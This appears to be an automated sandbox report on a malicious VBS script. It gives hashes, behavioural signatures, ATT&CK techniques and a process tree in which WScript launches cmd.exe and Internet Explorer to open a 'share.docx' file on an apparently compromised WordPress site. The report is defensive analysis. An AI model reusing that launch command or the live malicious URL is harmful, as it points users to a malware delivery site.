Overview

overview

8

Static

static

1

ec9cc1940f...cf.vbs

windows7-x64

8

ec9cc1940f...cf.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    117s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-04-2024 08:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs

  • Size

    27KB

  • MD5

    75ec9f68a5b62705c115db5119a78134

  • SHA1

    6209f948992fd18d4fc6fc6f89d9815369ac8931

  • SHA256

    ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf

  • SHA512

    82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780

  • SSDEEP

    384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1296
      • C:\Windows\explorer.exe
        explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
        3⤵
          PID:2652
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2992
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1036
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1036 CREDAT:275457 /prefetch:2
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2528

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      cc282e61881bee1f7c43cf2f7e869060

      SHA1

      6eea9d4ee332282056c7c0dee6a1f3bf28c783b2

      SHA256

      b4a8923c341d3c3a09b61b0bba6b106ecb8a8f58096484f4d373f0231016a091

      SHA512

      d5311e0c64529d56faf0e804661378b3684d26ae4a06df3106a5429aca61b1fda6733fb00c8e12b56bd2027fc099f772075fac4c968f3addc12ef7fa10a98870

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      46c58ddd3345412cd1fbac2df0fc3459

      SHA1

      c48e881a2743f93008d0a3643a370365b6801cf8

      SHA256

      4a7663a2f0d5d4316f1016d7602e75154b744680ba0853eb2c46a55d9e171e94

      SHA512

      82a271584ac75847d10ed8834e4fe987d54a2d4bb7f469adbab45d83ad4db605c1daa4b6160916ebf6821f53ae53b05f2c89e2666291f12cf1e3d4401f753120

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      bafa732cb11611885d8b89ae6885c19f

      SHA1

      0caf76015b30598e60c4d1758f180466c4d6593e

      SHA256

      f35e8790b5614f4c4bbc986ee874c1d86dda4908f674b2c28f761069d66d8728

      SHA512

      1de8e464e16807ea0e9f10a88f0c0d4a81bb814f9b54cae91d614744c51acd2b0b85363046b56404e40d6c11bf71ba44154087c6f9b013acae5fb1afbe8393f8

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      231c6757490dad177dff152e359f8c0e

      SHA1

      023270f36f829e1b02f94a9e59fc9466aa59f110

      SHA256

      426b422fd73d388f58eb099eddbc67ab411429de7e4546800e5b3edd93aec502

      SHA512

      c44eb69f3142b7c865ae3637851fccb47305624512bca84a81dd9aa4c6348615743e4df7241bfaec3e798a7482d4ae758db1b079ee7ac48c6d9617cf810816ac

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      30a6bb7ec44b835ed28fe1035c56f5a6

      SHA1

      9985c044bb8cdf33a90bcef7d6b4298107fe0ec7

      SHA256

      d0dbc3eeb88b8ba26b9bb2479616cddec9a20c5a9684de9e1523c29906d1cd49

      SHA512

      420cf993ab06b1691ac85963fe01f4cc2f9b051899359f27b9e34a33c8736ff3da2feb243c12edb4618d73a9dba4c54d91d0de23ae0c70d8f71ff6740a64c451

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      e5fe4a7a57dbe46c9d2ea42c489d0e7f

      SHA1

      2bfc591268d2a050ac193aec364425edc25ffa93

      SHA256

      9f07522119fd47677c41c9e1cd73cb41f289943470446863c2bde579a797d803

      SHA512

      6cfb33da64fdc99a842e6c812c32be6c43931ce57e11a53f6ab0cbbc06a82ac433b991d0b705fa3a35f42bd75ca0ba09b723288e439f68db489a14a08683482b

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      ecd85710e65945da7108105c27248a13

      SHA1

      8f159b77352bcc948255ff232a218f1eb90c4bb5

      SHA256

      6424227af54960f4ceba8c7470a2f9a4e3c5b9bc227163ed6816a98bd888c277

      SHA512

      8924f0fb02948e4c1eecff760460ef8c34d6625baaa3f772c1a2f9d2f35fe191ddbb66b64c7207f4a36f3c78f34a1ef0f10fbea868c93b7f47045f32b8af6d64

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      6fbddafaaef07d2a8cebe5dee77cdeb6

      SHA1

      88bfa76d3933fcd76fd69b0f6eb8dc638157be4d

      SHA256

      36f61686989841c280ed53ba97b94f4c6408adb38e1d2930ea4affa317f58432

      SHA512

      63520e6438df90a57242bf8e0e5e5966f5199eb49e8ceac66125fc90aac2ad252e92292c45b91d0e9747b1d3e3237322dc0a26c7394da2565e2c800174a62b2a

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      83074c59aa3b7cb98afb42a294e4fc54

      SHA1

      1bf84d682e6d2f61cfbe20a2d0186e8f0b033422

      SHA256

      8d8f9ecb2f20a8a747434f4353802435c42a4a9c9e1855dc2f7d2e6bc3c474c4

      SHA512

      fad98cbe9b35c48def29ca1c2b5cb9af1533b4373cb32c9ca48487209dc005b10ebbea3b04fac0d8e5b1a659125b0c39efc33ff2b4097f113d9641c1c20a4f03

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\CabD4AE.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\TarD746.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit